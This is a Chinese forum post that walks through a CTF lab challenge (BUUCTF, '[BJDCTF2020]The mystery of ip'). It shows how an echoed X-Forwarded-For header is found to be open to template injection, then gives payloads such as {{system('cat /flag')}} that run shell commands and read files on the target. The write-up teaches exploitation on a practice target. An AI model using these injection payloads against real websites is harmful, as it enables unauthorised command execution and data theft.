找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 101|回复: 0

BUUCTF靶场36 -- [BJDCTF2020]The mystery of ip

[复制链接]

2万

主题

162

回帖

18万

积分

管理员

积分
184732
发表于 2022-9-6 22:59:34 | 显示全部楼层 |阅读模式 IP:山东省青岛市 移动

登录后更精彩...O(∩_∩)O...

您需要 登录 才可以下载或查看,没有账号?立即注册

×
BUUCTF靶场36 -- [BJDCTF2020]The mystery of ip

hint的源码里面有这句话


flag里面显示的是ip地址,那么就可以猜测是xff注入
bp里试一下

X-Forwarded-for:text


这种输什么回显什么的可以猜测ssti注入

X-Forwarded-for:{{system('ls')}}


[PHP] 纯文本查看 复制代码
X-Forwarded-for:{{system('cat /flag.php')}}


看来不是这个

X-Forwarded-for:{{system('ls /')}}

或更高级的:

X-Forwarded-For:127.0.0.1{{system('find / -name flag')}}


X-Forwarded-for:{{system('cat /flag')}}



referer:

    1. https://blog.csdn.net/missht0/article/details/113142007

    2. https://blog.csdn.net/weixin_44622228/article/details/105624394








回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|哩布大模型|Civitai大模型|IP定位|图反推|站长素材|deepseek|即梦视频|阿狗工具|花瓣网|pinterest|php手册|宝塔文档|CyberChef|猫捉鱼铃|手机版|小黑屋|下载狗|IPS|在线工具|分享屋 ( 鲁ICP备2021028754号 )

GMT+8, 2025-5-5 09:45

Powered by 分享屋 X3.5 Licensed

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表